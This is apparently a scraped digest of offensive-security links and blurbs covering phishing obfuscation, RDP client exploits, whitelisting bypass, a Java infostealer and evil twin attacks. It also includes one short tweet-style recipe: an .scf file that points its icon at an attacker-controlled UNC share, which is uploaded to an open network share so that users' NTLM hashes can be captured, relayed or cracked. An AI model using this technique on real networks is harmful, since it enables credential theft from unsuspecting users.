Obfuscation Techniques used in Phishing Attacks - redteamsec
https://www.reddit.com/r/redteamsec/comments/ampngj/obfuscation_techniques_used_in_phishing_attacks/
reddit
r/redteamsec - Obfuscation Techniques used in Phishing Attacks
9 votes and 0 comments so far on Reddit
Tribe of Hackers: Free PDF Version - Threatcare
https://www.threatcare.com/tribe-of-hackers-free-pdf/
Threatcare
Tribe of Hackers Free PDF - Threatcare
Get the Tribe of Hackers Free PDF from this page by signing up with your email address. Tribe of Hackers contains insights from 70 industry professionals.
Need creds on a local network? Found an open network share?
1) Create an scf file with the following:
[Shell]
Command=2
IconFile=\\X.X.X.X\share\test.ico
[Taskbar]
Command=ToggleDesktop
2) Upload to the share.
3) Run your capture tool or relay creds.
4) Wait, crack hash, enjoy
Automation In Red Teaming – Red Teaming with a Blue Team Mentaility – Medium
https://medium.com/red-teaming-with-a-blue-team-mentaility/automation-in-red-teaming-32363e3a50d
Medium
Automation In Red Teaming
The offensive security community is advancing rapidly. With platforms such as Twitter along with several widely used blogging sites…
Mass Cracking Cybrary Accounts – Somdev Sangwan
https://s0md3v.github.io/mass-cracking-cybrary-accounts/
Reverse RDP Attack: Code Execution on RDP Clients - Check Point Research
https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/
Check Point Research
Research by: Eyal Itkin. Overview: Used by thousands of IT professionals and security researchers worldwide, the Remote Desktop Protocol (RDP) is usually considered a safe and trustworthy application to connect to remote computers. Whether it is used to help…
Phishing Campaigns are Manipulating the Windows Control Panel Extension to Deliver Banking Trojans - Cofense
https://cofense.com/phishing-campaigns-manipulating-windows-control-panel-extension-deliver-banking-trojans/
Cofense
By Aaron Riley and Marcel Feller. CISO Summary: Recently, Cofense™ has seen phishing campaigns that bypass email security using a .cpl file extension attachment. .CPL is the file name extension for items or icons appearing in the Windows Control Panel. These…
Notes on fuzzing ImageMagick and GraphicsMagick - The Blagoblag
https://alexgaynor.net/2019/feb/05/notes-fuzzing-imagemagick-graphicsmagick/
Bypass Application Whitelisting using Weak Path Rule
https://www.hackingarticles.in/bypass-application-whitelisting-using-weak-path-rule/
Hacking Articles
Learn how to bypass application whitelisting security by exploiting weak path rules in Windows environments for penetration testing.
Qealler – a new JAR-based information stealer | Zscaler Blog
https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer
Zscaler
Qealler – a new JAR-based information stealer
Zscaler ThreatLabZ has observed a rise in the malware's activity, which was detected in the Zscaler Cloud Sandbox. "Qealler", a new piece of malware, is written in Java and designed to silently steal credentials in infected machines. Read more.
Clever Phishing Attack Enlists Google Translate to Spoof Login Page | Threatpost | The first stop for security news
https://threatpost.com/clever-phishing-attack-enlists-google-translate-to-spoof-facebook-login-page/141571/
Threat Post
Clever Phishing Attack Enlists Google Translate to Spoof Login Page
A tricky two-stage phishing scam is targeting Facebook and Google credentials using a landing page that hides behind Google's translate feature.
[PoC] [CVE-2018-18354] Chrome remote code execution attack chain
Ignore Sandbox, Ignore Applock, Ignore download restriction
combined 3 bugs into logical vulnerability attack chain
https://t.co/IUWnx1mgZM
How Android Q improves privacy and permission controls over Android Pie
https://www.xda-developers.com/android-q-privacy-permission-controls/
XDA Developers
How Android Q improves Privacy and Permission Controls over Android Pie
Android Q will bring a revamp to permission management and enhancements to protect user privacy. Here's what Google has changed since Android Pie.
ClusterFuzz, an infrastructure used for fuzzing Chrome and OSS-Fuzz, is open source now! Enjoy responsibly :)
Blog: https://t.co/v6ywgccmRH
Code: https://t.co/lO9ACd7FY8
Google Open Source Blog
Open sourcing ClusterFuzz
The latest news from Google on open source releases, major projects, events, and student outreach programs.
Remote Code Execution via Path Traversal in the Device Metadata Authoring Wizard
https://posts.specterops.io/remote-code-execution-via-path-traversal-in-the-device-metadata-authoring-wizard-a0d5839fc54f
Medium
Attackers can use the .devicemanifest-ms and .devicemetadata-ms file extensions for phishing if the Windows Driver Kit is installed.
DnsCache. reference example for how to call the Windows API to enumerate cached DNS records in the Windows resolver
https://t.co/YDhPvp9LKU
Discovering and Exploiting a Vulnerability in Android’s Personal Dictionary (CVE-2018-9375) | IOActive
https://ioactive.com/discovering-and-exploiting-a-vulnerability-in-androids-personal-dictionary/
Frida 12.3 Debuts New Crash Reporting Feature - NowSecure
https://www.nowsecure.com/blog/2019/02/07/frida-12-3-debuts-new-crash-reporting-feature/
NowSecure
Frida 12.3 Debuts New Crash Reporting Feature
The Frida 12.3 open-source software dynamic instrumentation toolkit offers an exciting new app crash reporting feature that provides more details about... #Frida #OpenSourceTools #ProductUpdates
A guide to HTTP security headers for better web browser security | Detectify Blog
https://blog.detectify.com/2019/02/05/guide-http-security-headers-for-better-web-browser-security/
Detectify Blog
A guide to HTTP security headers for better web browser security - Detectify Blog
A guide on different response HTTP-headers that a web server can include in a request in order to prevent XSS attacks, protecting the web browser user.
Evil Twin Attack - The Definitive Guide (Updated 2019)
https://rootsh3ll.com/evil-twin-attack/